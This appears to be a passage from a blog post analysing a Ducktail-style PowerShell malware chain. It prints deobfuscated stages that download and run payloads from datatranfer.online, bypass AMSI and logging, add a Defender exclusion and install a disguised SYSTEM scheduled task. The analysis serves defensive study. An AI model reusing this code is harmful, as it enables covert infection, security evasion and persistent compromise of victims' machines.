}
Write-Host "Try again";
}

}
Start-Sleep -Seconds 10;
}
try{
$mtx.ReleaseMutex();
}catch{
#bo qua
}
try{
$mtx_child.ReleaseMutex();
}catch{
#bo qua
}
Write-host "OK";
Wait-Job $job
Remove-Job $job

Ok, let’s start by explaining the code section by section. With some experience in Ducktail, and many decoded PS, we can see how the first file is a docx. This is not exactly a threat, but part of the “hook” document that the user will see on screen, along with some images so that they do not realize that the phishing they downloaded, is already in the post-exploitation phase XD

# Define the file name and paths
$fileName = "069d8df435ac9619e03613b77bc3ffe8.docx"
$tempFolder = [System.IO.Path]::GetTempPath();
$filePath = Join-Path -Path $tempFolder -ChildPath $fileName
$fileUrl = "<http://datatranfer.online/file/docs/$fileName>";

# Create a script block for the job
$scriptBlock = {
param (
[string]$filePath,
[string]$fileUrl
)

# Check if the file exists
if (-not (Test-Path -Path $filePath)) {
Write-Host "File does not exist. Downloading..."

# Download the file from the URL
Invoke-WebRequest -Uri $fileUrl -OutFile $filePath

Write-Host "Download complete."
}

# Open the file with the default program
Start-Process -FilePath $filePath
}

# Start the job
$job = Start-Job -ScriptBlock $scriptBlock -ArgumentList $filePath, $fileUrl

# Check if the job is running
if ($job.State -eq 'Running') {
Write-Host "Job is running. Job ID: $($job.Id)"
} else {
Write-Host "Job failed to start."
}

function Download-FileFromUrl {
param (
[string]$Url,
[string]$Destination
)

$count = 10;
while($count -gt 0)
{
try{
Invoke-WebRequest -URI $Url -OutFile $Destination;
Write-Host "Download success $Url";
break;
}
catch
{
Write-Host $_.Exception.Message;
Write-Host "Error download file $Url"
$count -= 1;
Start-Sleep -s 15;
}
}

The following is a mutex. There is a lot of bibliography about mutexes, so I will limit myself to tell you that it is part of the execution and that you do not get lost with it, the important thing has to be read between the lines:

$isUACOpen = (Get-ItemProperty HKLM:\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Policies\\\\\\\\System).**EnableLUA**;
if($isUACOpen -eq 1)
{
$isUACOpen = (Get-ItemProperty HKLM:\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System).**ConsentPromptBehaviorAdmin**;
}

The attacker wants "little things" from our UAC, that is, he does not want to be bothered when scaling to ADM, as explained by MS in EnableLUA, and ConsentPromptBehaviorAdmin.

The next part of the code, related to the previous one, is if we have the UAC too exposed, execute the malicious code encoded in base64:

if($isUACOpen -eq 0)
{
Write-Host "ko can bypass uac";
Start-Process "cmd.exe" -WindowStyle hidden -Verb runas -ArgumentList ("/c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JABhAHkAdwBjAHgAdABoAGkAYgBkAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBkAEcARQB2AGMASABNAHYATwBHAE0AeABaAEQARgBoAE0AVABVAHkATQBtAFUAdwBNAHoAYwB3AE4AVwBOAGsATQBHAEoAaABOAG0AVgBsAE0AagBCAG0ATgBEAGQAbABNADIATQA9ACIAKQApADsACgAkAHQAdABmAG8AYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEQAbwB2AEwAMgBSAGgAZABHAEYAMABjAG0ARgB1AFoAbQBWAHkATABtADkAdQBiAEcAbAB1AFoAUwA5AGgAYwBHAGsAdgBaAG0AbABzAFoAVwBSAGgAIgApACkAOwAKACQAdQByAGkAIAA9ACAAKAAkAHQAdABmAG8AYgAgACsAIAAkAGEAeQB3AGMAeAB0AGgAaQBiAGQAKQA7AAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADsACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAAoAewAKAAkACgAJAHQAcgB5AHsACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AAoACQAJAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAYwBvAG4AdABlAG4AdAAuAGMAbwBuAHQAZQBuAHQAOwAKAAkACQBiAHIAZQBhAGsAOwAKAAkAfQAKAAkAYwBhAHQAYwBoAAoACQB7AAoACQAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUACgAJAAkAJABjAG8AdQBuAHQAIAAtAD0AIAAxADsACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsACgAJAH0ACgB9AAoA");
exit;
}

This code is subtly different from decoding. It's still base64, but "EncodedCommand" encodes in UTF-16, so we'll make a small modification to our CC:

Decoding “EncodedCommand” Part of PowerShell execution

If we didn't do this, the code would display strange characters, which we would have to remove using replace in our favorite notepad. With this config, we skip that step ;)

And this is the resulting code:

$aywcxthibd=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dGEvcHMvOGMxZDFhMTUyMmUwMzcwNWNkMGJhNmVlMjBmNDdlM2M="));
$ttfob=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("aHR0cDovL2RhdGF0cmFuZmVyLm9ubGluZS9hcGkvZmlsZWRh"));
$uri = ($ttfob + $aywcxthibd);
$count = 10;
while($count -gt 0)
{

try{
$content = Invoke-WebRequest -Uri $uri -UseBasicParsing;
Invoke-Expression $content.content;
break;
}
catch
{
Write-Host $_.Exception.Message
$count -= 1;
Start-Sleep -s 15;
}
}

From the structure, it already smells like a URL, and indeed, another URL, which when downloaded has this:

$jfsbsnefd=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Y1NBaVYybHVaRzkzY3lCRVpXWmxibVJsY2lJZ2ZRMEtEUW9qSUVOb1pXTnJJR2xtSUdGdWVTQnZkR2hsY2lCaGJuUnBkbWx5ZFhNZ2MyOW1kSGRoY21VZ2FYTWdhVzV6ZEdGc2JHVmtEUW9rYjNSb1pYSkJiblJwZG1seWRYTWdQU0JIWlhRdFYyMXBUMkpxWldOMElDMU9ZVzFsYzNCaFkyVWdJbEp2YjNSY1UyVmpkWEpwZEhsRFpXNTBaWEl5SWlBdFEyeGhjM01nSWtGdWRHbDJhWEoxYzFCeWIyUjFZM1FpSUh3Z1YyaGxjbVV0VDJKcVpXTjBJSHNnSkY4dVpHbHpjR3hoZVU1aGJXVWdMVzVsSUNKWGFXNWtiM2R6SUVSbFptVnVaR1Z5SWlCOURRb2thWE5TZFc1dWFXNW5JRDBnSkdaaGJITmxPdzBLYVdZZ0tDUjNhVzVrYjNkelJHVm1aVzVrWlhJZ0xXNWxJQ1J1ZFd4c0tTQjdEUW9nSUNBZ0pHbHpVblZ1Ym1sdVp5QTlJQ1IwY25WbE93MEtJQ0FnSUVGa1pDMU5jRkJ5WldabGNtVnVZMlVnTFVWNFkyeDFjMmx2YmxCaGRHZ2dJa002WEZkcGJtUnZkM05jVkdWdGNDSTdEUXA5SUdWc2MyVnBaaUFvSkc5MGFHVnlRVzUwYVhacGNuVnpJQzF1WlNBa2JuVnNiQ2tnZXcwS0lDQWdJQTBLZlNCbGJITmxJSHNOQ2lBZ0lDQWthWE5TZFc1dWFXNW5JRDBnSkhSeWRXVTdEUXA5RFFvZ0RRcHBaaWdrYVhOU2RXNXVhVzVuSUMxbGNTQWtabUZzYzJVcElIc05DaUFnSUNCbGVHbDBPdzBLZlEwS0RRb05DbVoxYm1OMGFXOXVJRVJ2ZDI1c2IyRmtMVVpwYkdWWGFYUm9VbVYwY25rZ2V3MEtJQ0FnSUhCaGNtRnRJQ2dOQ2lBZ0lDQWdJQ0FnVzNOMGNtbHVaMTBrZFhKc0xBMEtJQ0FnSUNBZ0lDQmJjM1J5YVc1blhTUmtaWE4wYVc1aGRHbHZiaXdOQ2lBZ0lDQWdJQ0FnVzJsdWRGMGtiV0Y0VW1WMGNtbGxjeUE5SURNd0xBMEtJQ0FnSUNBZ0lDQmJhVzUwWFNSeVpYUnllVVJsYkdGNVNXNVRaV052Ym1SeklEMGdOUTBLSUNBZ0lDa05DZzBLSUNBZ0lDUnlaWFJ5ZVVOdmRXNTBJRDBnTUEwS0lDQWdJQ1JrYjNkdWJHOWhaRk4xWTJObFpXUmxaQ0E5SUNSbVlXeHpaUTBLRFFvZ0lDQWdkMmhwYkdVZ0tDUnlaWFJ5ZVVOdmRXNTBJQzFzZENBa2JXRjRVbVYwY21sbGN5QXRZVzVrSUMxdWIzUWdKR1J2ZDI1c2IyRmtVM1ZqWTJWbFpHVmtLU0I3RFFvZ0lDQWdJQ0FnSUhSeWVTQjdEUW9nSUNBZ0lDQWdJQ0FnSUNBaklFTm9aV05ySUdsbUlIUm9aU0JrWlhOMGFXNWhkR2x2YmlCbWFXeGxJR0ZzY21WaFpIa2daWGhwYzNSekRRb2dJQ0FnSUNBZ0lDQWdJQ0JwWmlBb1ZHVnpkQzFRWVhSb0lDMVFZWFJvSUNSa1pYTjBhVzVoZEdsdmJpQXRVR0YwYUZSNWNHVWdUR1ZoWmlrZ2V3MEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lBMEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lIUnllWHNOQ2cwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQlNaVzF2ZG1VdFNYUmxiU0F0VUdGMGFDQWtaR1Z6ZEdsdVlYUnBiMjQ3RFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnZlEwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdOaGRHTm9ldzBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCWGNtbDBaUzFJYjNOMElDSkdhV3hsSUdGc2NtVmhaSGtnWlhocGMzUnpJR0YwSUNSa1pYTjBhVzVoZEdsdmJpNGdSRzkzYm14dllXUWdZMkZ1WTJWc1pXUXVJanNOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2NtVjBkWEp1T3cwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwTkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBTkNpQWdJQ0FnSUNBZ0lDQWdJSDBOQ2lBZ0lDQWdJQ0FnSUNBZ0lDTWdWWE5sSUZkbFlrTnNhV1Z1ZENCMGJ5QmtiM2R1Ykc5aFpDQjBhR1VnWm1sc1pRMEtJQ0FnSUNBZ0lDQWdJQ0FnSkhkbFlrTnNhV1Z1ZENBOUlFNWxkeTFQWW1wbFkzUWdVM2x6ZEdWdExrNWxkQzVYWldKRGJHbGxiblFOQ2lBZ0lDQWdJQ0FnSUNBZ0lDUjNaV0pEYkdsbGJuUXVSRzkzYm14dllXUkdhV3hsS0NSMWNtd3NJQ1JrWlhOMGFXNWhkR2x2YmlrTkNnMEtJQ0FnSUNBZ0lDQWdJQ0FnSXlCRGFHVmpheUJwWmlCMGFHVWdaRzkzYm14dllXUWdkMkZ6SUhOMVkyTmxjM05tZFd3TkNpQWdJQ0FnSUNBZ0lDQWdJR2xtSUNoVVpYTjBMVkJoZEdnZ0xWQmhkR2dnSkdSbGMzUnBibUYwYVc5dUlDMVFZWFJvVkhsd1pTQk1aV0ZtS1NCN0RRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1YzSnBkR1V0U0c5emRDQWlSRzkzYm14dllXUWdZMjl0Y0d4bGRHVmtPaUFrWkdWemRHbHVZWFJwYjI0aURRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0pHUnZkMjVzYjJGa1UzVmpZMlZsWkdWa0lEMGdKSFJ5ZFdVTkNpQWdJQ0FnSUNBZ0lDQWdJSDBnWld4elpTQjdEUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpUkc5M2JteHZZV1FnWm1GcGJHVmtPaUFrZFhKc0lnMEtJQ0FnSUNBZ0lDQWdJQ0FnZlEwS0lDQWdJQ0FnSUNCOURRb2dJQ0FnSUNBZ0lHTmhkR05vSUZ0VGVYTjBaVzB1VG1WMExsZGxZa1Y0WTJWd2RHbHZibDBnZXcwS0lDQWdJQ0FnSUNBZ0lDQWdJeUJJWVc1a2JHVWdhVzUwWlhKdVpYUWdaWEp5YjNKekRRb2dJQ0FnSUNBZ0lDQWdJQ0JYY21sMFpTMUliM04wSUNKSmJuUmxjbTVsZENCbGNuSnZjam9nSkNna1h5NUZlR05sY0hScGIyNHVUV1Z6YzJGblpTa2lEUW9nSUNBZ0lDQWdJSDBOQ2lBZ0lDQWdJQ0FnWTJGMFkyZ2dldzBLSUNBZ0lDQWdJQ0FnSUNBZ0l5QklZVzVrYkdVZ2IzUm9aWElnWlhKeWIzSnpEUW9nSUNBZ0lDQWdJQ0FnSUNCWGNtbDBaUzFJYjNOMElDSkZjbkp2Y2pvZ0pDZ2tYeTVGZUdObGNIUnBiMjR1VFdWemMyRm5aU2tpRFFvZ0lDQWdJQ0FnSUgwTkNnMEtJQ0FnSUNBZ0lDQWpJRWxtSUhSb1pTQmtiM2R1Ykc5aFpDQm1ZV2xzWldRc0lHbHVZM0psYldWdWRDQjBhR1VnY21WMGNua2dZMjkxYm5RZ1lXNWtJSGRoYVhRZ1ltVm1iM0psSUhKbGRISjVhVzVuRFFvZ0lDQWdJQ0FnSUdsbUlDZ3RibTkwSUNSa2IzZHViRzloWkZOMVkyTmxaV1JsWkNrZ2V3MEtJQ0FnSUNBZ0lDQWdJQ0FnSkhKbGRISjVRMjkxYm5Rckt3MEtJQ0FnSUNBZ0lDQWdJQ0FnYVdZZ0tDUnlaWFJ5ZVVOdmRXNTBJQzFzZENBa2JXRjRVbVYwY21sbGN5a2dldzBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWxKbGRISjVhVzVuSUdSdmQyNXNiMkZrSUdsdUlDUnlaWFJ5ZVVSbGJHRjVTVzVUWldOdmJtUnpJSE5sWTI5dVpITXVMaTRpRFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnVTNSaGNuUXRVMnhsWlhBZ0xWTmxZMjl1WkhNZ0pISmxkSEo1UkdWc1lYbEpibE5sWTI5dVpITU5DaUFnSUNBZ0lDQWdJQ0FnSUgwTkNpQWdJQ0FnSUNBZ2ZRMEtJQ0FnSUgwTkNnMEtJQ0FnSUdsbUlDZ3RibTkwSUNSa2IzZHViRzloWkZOMVkyTmxaV1JsWkNrZ2V3MEtJQ0FnSUNBZ0lDQlhjbWwwWlMxSWIzTjBJQ0pFYjNkdWJHOWhaQ0JtWVdsc1pXUWdZV1owWlhJZ0pHMWhlRkpsZEhKcFpYTWdjbVYwY21sbGN5NGlEUW9nSUNBZ2ZRMEtmUTBLVjNKcGRHVXRTRzl6ZENBaVUyeGxaWEFnTVRCeklqc05DbE4wWVhKMExWTnNaV1Z3SUMxVFpXTnZibVJ6SURFd093MEtWM0pwZEdVdFNHOXpkQ0FpUkc5M2JteHZZV1FnWW05MElqc05Da1J2ZDI1c2IyRmtMVVpwYkdWWGFYUm9VbVYwY25rZ0xYVnliQ0FpYUhSMGNEb3ZMMlJoZEdGMGNtRnVabVZ5TG05dWJHbHVaUzltYVd4bEwzUXZiV0ZwYm1KdmRDNWxlR1VpSUMxa1pYTjBhVzVoZEdsdmJpQWlRenBjVjJsdVpHOTNjMXhVWlcxd1hITjJZM3BJYjNOMExtVjRaU0k3RFFwWGNtbDBaUzFJYjNOMElDSmhaR1FnZEdGemF5STdEUW9rWVdOMGFXOXVJRDBnVG1WM0xWTmphR1ZrZFd4bFpGUmhjMnRCWTNScGIyNGdMVVY0WldOMWRHVWdJa002WEZkcGJtUnZkM05jVkdWdGNGeHpkbU42U0c5emRDNWxlR1VpSUMxQmNtZDFiV1Z1ZENBaVkyaDFZbVZrWVc0Z1pHRjBZWFJ5WVc1bVpYSXViMjVzYVc1bElqc05DaVJ3Y21sdVkybHdZV3dnUFNCT1pYY3RVMk5vWldSMWJHVmtWR0Z6YTFCeWFXNWphWEJoYkNBdFZYTmxja2xrSUNKVFdWTlVSVTBpSUMxU2RXNU1aWFpsYkNCSWFXZG9aWE4wT3cwS0pIUnlhV2RuWlhJZ1BTQk9aWGN0VTJOb1pXUjFiR1ZrVkdGemExUnlhV2RuWlhJZ0xVRjBURzluVDI0N0RRb2tjMlYwZEdsdVozTWdQU0JPWlhjdFUyTm9aV1IxYkdWa1ZHRnphMU5sZEhScGJtZHpVMlYwSUMxQmJHeHZkMU4wWVhKMFNXWlBia0poZEhSbGNtbGxjeUF0Ukc5dWRGTjBiM0JKWmtkdmFXNW5UMjVDWVhSMFpYSnBaWE03RFFwVmJuSmxaMmx6ZEdWeUxWTmphR1ZrZFd4bFpGUmhjMnNnTFZSaGMydE9ZVzFsSUNKNlUyVnlkbWxqWldOb2RXSmxaR0Z1SWlBdFEyOXVabWx5YlRva1ptRnNjMlU3RFFwU1pXZHBjM1JsY2kxVFkyaGxaSFZzWldSVVlYTnJJQzFCWTNScGIyNGdKR0ZqZEdsdmJpQXRVSEpwYm1OcGNHRnNJQ1J3Y21sdVkybHdZV3dnTFZSeWFXZG5aWElnSkhSeWFXZG5aWElnTFZObGRIUnBibWR6SUNSelpYUjBhVzVuY3lBdFZHRnphMDVoYldVZ0lucFRaWEoyYVdObFkyaDFZbVZrWVc0aUlDMUVaWE5qY21sd2RHbHZiaUFpVjJsdVpHOTNjeUJvWld4d1pYSWlPdzBLVjNKcGRHVXRTRzl6ZENBaWNuVnVJSFJoYzJzaU93MEtVM1JoY25RdFUyTm9aV1IxYkdWa1ZHRnpheUF0VkdGemEwNWhiV1VnSW5wVFpYSjJhV05sWTJoMVltVmtZVzRpT3cwS0RRcFhjbWwwWlMxSWIzTjBJQ0pyWlhRZ2RHaDFZeUk3RFFva1RYVjBaWGhKYm5OMFlXNWpaUzVTWld4bFlYTmxUWFYwWlhnb0tUc05DZzBLRFFvTkNnMEtEUW9OQ2cwS0RRb05DZzBLRFFvPQ=="));
$lyulayuejj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Q1EwS1puVnVZM1JwYjI0Z1YyRnBkQzFQYmsxMWRHVjRJSHNOQ2lBZ0lDQndZWEpoYlNBb0RRb2dJQ0FnSUNBZ0lGdHdZWEpoYldWMFpYSW9UV0Z1WkdGMGIzSjVQU1IwY25WbEtWME5DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtUWFYwWlhoSlpBMEtJQ0FnSUNrTkNnMEtJQ0FnSUhSeWVTQjdEUW9nSUNBZ0lDQWdJQ1JOZFhSbGVFbHVjM1JoYm1ObElEMGdUbVYzTFU5aWFtVmpkQ0JUZVhOMFpXMHVWR2h5WldGa2FXNW5MazExZEdWNElDMUJjbWQxYldWdWRFeHBjM1FnSjJaaGJITmxKeXdnSkUxMWRHVjRTV1FOQ2lBZ0lDQWdJQ0FnZDJocGJHVWdLQzF1YjNRZ0pFMTFkR1Y0U1c1emRHRnVZMlV1VjJGcGRFOXVaU2d4TURBd0tTa2dldzBLSUNBZ0lDQWdJQ0FnSUNBZ1UzUmhjblF0VTJ4bFpYQWdMVzBnTlRBd0RRb2dJQ0FnSUNBZ0lIME5DaUFnSUNBZ0lDQWdjbVYwZFhKdUlDUk5kWFJsZUVsdWMzUmhibU5sRFFvZ0lDQWdmU0JqWVhSamFDQmJVM2x6ZEdWdExsUm9jbVZoWkdsdVp5NUJZbUZ1Wkc5dVpXUk5kWFJsZUVWNFkyVndkR2x2YmwwZ2V3MEtJQ0FnSUNBZ0lDQWtUWFYwWlhoSmJuTjBZVzVqWlNBOUlFNWxkeTFQWW1wbFkzUWdVM2x6ZEdWdExsUm9jbVZoWkdsdVp5NU5kWFJsZUNBdFFYSm5kVzFsYm5STWFYTjBJQ2RtWVd4elpTY3NJQ1JOZFhSbGVFbGtEUW9nSUNBZ0lDQWdJSEpsZEhWeWJpQlhZV2wwTFU5dVRYVjBaWGdnTFUxMWRHVjRTV1FnSkUxMWRHVjRTV1FOQ2lBZ0lDQjlEUXA5RFFwWGNtbDBaUzFJYjNOMElDSlhRWFJwYm1jaU93MEtKRTExZEdWNFNXNXpkR0Z1WTJVZ1BTQlhZV2wwTFU5dVRYVjBaWGdnTFUxMWRHVjRTV1FnSWxKVlRrNUpUa2NpT3cwS0RRcFhjbWwwWlMxSWIzTjBJQ0p5ZFc1dWFXNW5JanNOQ2cwS0RRb2pJRU5vWldOcklHbG1JRmRwYm1SdmQzTWdSR1ZtWlc1a1pYSWdhWE1nYVc1emRHRnNiR1ZrSUdGdVpDQmxibUZpYkdWa0RRb2tkMmx1Wkc5M2MwUmxabVZ1WkdWeUlEMGdSMlYwTFZkdGFVOWlhbVZqZENBdFRtRnRaWE53WVdObElDSlNiMjkwWEZObFkzVnlhWFI1UTJWdWRHVnlNaUlnTFVOc1lYTnpJQ0pCYm5ScGRtbHlkWE5RY205a2RXTjBJaUI4SUZkb1pYSmxMVTlpYW1WamRDQjdJQ1JmTG1ScGMzQnNZWGxPWVcxbElDMWw="));
$pcbmli=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("blB1YmxpYyxTdGF0aWM="));
$bokaabh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm8="));
$ukqyefbmi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZXR3UHJvdmlkZXI="));
$qjmjs=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$piualxi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("eXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlRyYWNpbmcuUFNFdHdMb2dQcm92aWRlcg=="));
$csgnlg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Uw=="));
$pwckunaunc=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("b25QdWJsaWMsSW5zdGFuY2U="));
$cnabzidj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tg=="));
$qchnys=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("X2VuYWJsZWQ="));
$ahlqtwa=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bQ=="));
$anfmwtwcbi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Y3MuRXZlbnRpbmcuRXZlbnRQcm92aWRlcg=="));
$dlfjuvi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdGVtLkRpYWdub3N0aQ=="));
$zyamzl=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dGVtLkNvcmU="));
$sbufr=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lz"));
$epxxi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("b25QdWJsaWMsU3RhdGlj"));
$mjlcobsv=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tg=="));
$ygxmj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bXNpSW5pdEZhaWxlZA=="));
$pkthe=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YQ=="));
$yyijbukto=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5BbXNpVXRpbHM="));
$dwlwa=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lz"));
$mwceo=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("UnRabmw1ZEdkaVoyUnJZaUE5SUNSMGNuVmw="));
$hhhwloob=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("SkdkbmIy"));
Invoke-Expression
([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($hhhwloob
+ $mwceo)))); $ffbxdoueycxyauct = [Ref].Assembly.GetType(($dwlwa +
$yyijbukto)).GetField(($pkthe + $ygxmj),($mjlcobsv + $epxxi));
$ffbxdoueycxyauct.SetValue($null,$ggodmfyytgbgdkb);
[Reflection.Assembly]::LoadWithPartialName(($sbufr + $zyamzl)).GetType(($dlfjuvi
+ $anfmwtwcbi)).GetField(($ahlqtwa + $qchnys),($cnabzidj +
$pwckunaunc)).SetValue([Ref].Assembly.GetType(($csgnlg +
$piualxi)).GetField(($qjmjs + $ukqyefbmi),($mjlcobsv +
$epxxi)).GetValue($null),0); Invoke-Expression
([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($lyulayuejj
+ $jfsbsnefd))));

In summary, we have a new payload + the same fuss. Why change if it works? In this case, the code is:

function Wait-OnMutex {
param (
[parameter(Mandatory=$true)]
[string]$MutexId
)
try {
$MutexInstance = New-Object System.Threading.Mutex -ArgumentList 'false', $MutexId
while (-not $MutexInstance.WaitOne(1000)) {
Start-Sleep -m 500
}
return $MutexInstance
} catch [System.Threading.AbandonedMutexException] {
$MutexInstance = New-Object System.Threading.Mutex -ArgumentList 'false', $MutexId
return Wait-OnMutex -MutexId $MutexId
}
}
Write-Host "WAting";
$MutexInstance = Wait-OnMutex -MutexId "RUNNING";
Write-Host "running";
# Check if Windows Defender is installed and enabled
$windowsDefender = Get-WmiObject -Namespace "Root\\SecurityCenter2" -Class "AntivirusProduct" | Where-Object { $_.displayName -eq "Windows Defender" }
# Check if any other antivirus software is installed
$otherAntivirus = Get-WmiObject -Namespace "Root\\SecurityCenter2" -Class "AntivirusProduct" | Where-Object { $_.displayName -ne "Windows Defender" }
$isRunning = $false;
if ($windowsDefender -ne $null) {
$isRunning = $true;
Add-MpPreference -ExclusionPath "C:\\Windows\\Temp";
} elseif ($otherAntivirus -ne $null) {

} else {
$isRunning = $true;
}

if($isRunning -eq $false) {
exit;
}
function Download-FileWithRetry {
param (
[string]$url,
[string]$destination,
[int]$maxRetries = 30,
[int]$retryDelayInSeconds = 5
)
$retryCount = 0
$downloadSucceeded = $false
while ($retryCount -lt $maxRetries -and -not $downloadSucceeded) {
try {
# Check if the destination file already exists
if (Test-Path -Path $destination -PathType Leaf) {

try{
Remove-Item -Path $destination;
}
catch{
Write-Host "File already exists at $destination. Download canceled.";
return;
}

}
# Use WebClient to download the file
$webClient = New-Object System.Net.WebClient
$webClient.DownloadFile($url, $destination)
# Check if the download was successful
if (Test-Path -Path $destination -PathType Leaf) {
Write-Host "Download completed: $destination"
$downloadSucceeded = $true
} else {
Write-Host "Download failed: $url"
}
}
catch [System.Net.WebException] {
# Handle internet errors
Write-Host "Internet error: $($_.Exception.Message)"
}
catch {
# Handle other errors
Write-Host "Error: $($_.Exception.Message)"
}
# If the download failed, increment the retry count and wait before retrying
if (-not $downloadSucceeded) {
$retryCount++
if ($retryCount -lt $maxRetries) {
Write-Host "Retrying download in $retryDelayInSeconds seconds..."
Start-Sleep -Seconds $retryDelayInSeconds
}
}
}
if (-not $downloadSucceeded) {
Write-Host "Download failed after $maxRetries retries."
}
}
Write-Host "Sleep 10s";
Start-Sleep -Seconds 10;
Write-Host "Download bot";
Download-FileWithRetry -url "<http://datatranfer.online/file/t/mainbot.exe>" -destination "C:\\Windows\\Temp\\svczHost.exe";
Write-Host "add task";
$action = New-ScheduledTaskAction -Execute "C:\\Windows\\Temp\\svczHost.exe" -Argument "chubedan datatranfer.online";
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest;
$trigger = New-ScheduledTaskTrigger -AtLogOn;
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries;
Unregister-ScheduledTask -TaskName "zServicechubedan" -Confirm:$false;
Register-ScheduledTask -Action $action -Principal $principal -Trigger $trigger -Settings $settings -TaskName "zServicechubedan" -Description "Windows helper";
Write-Host "run task";
Start-ScheduledTask -TaskName "zServicechubedan";
Write-Host "ket thuc";
$MutexInstance.ReleaseMutex();

I will divide this analysis into 2 parts, as this component is of eminent defense evasion. First, we will have an investigation through the WMI database of what the corporate AV is. If it’s defender we will force it to load an exclusion with “Add-MpPreference -ExclusionPath”:

# Check if Windows Defender is installed and enabled
$windowsDefender = Get-WmiObject -Namespace "Root\\\\SecurityCenter2" -Class "AntivirusProduct" | Where-Object { $_.displayName -eq "Windows Defender" }
# Check if any other antivirus software is installed
$otherAntivirus = Get-WmiObject -Namespace "Root\\\\SecurityCenter2" -Class "AntivirusProduct" | Where-Object { $_.displayName -ne "Windows Defender" }
$isRunning = $false;
if ($windowsDefender -ne $null) {
$isRunning = $true;
**Add-MpPreference -ExclusionPath "C:\\\\Windows\\\\Temp";**

If it is another AV, as we said in spanish “having studied”. In reality, jokes aside, many AVs store their exclusions in the Windows registry, but, even if you modify that registry, in the next policy update, that change will disappear. It was something that i checked years ago in a McAfee, so it may not apply to all equally. If you have more info on this, I read you in comments.

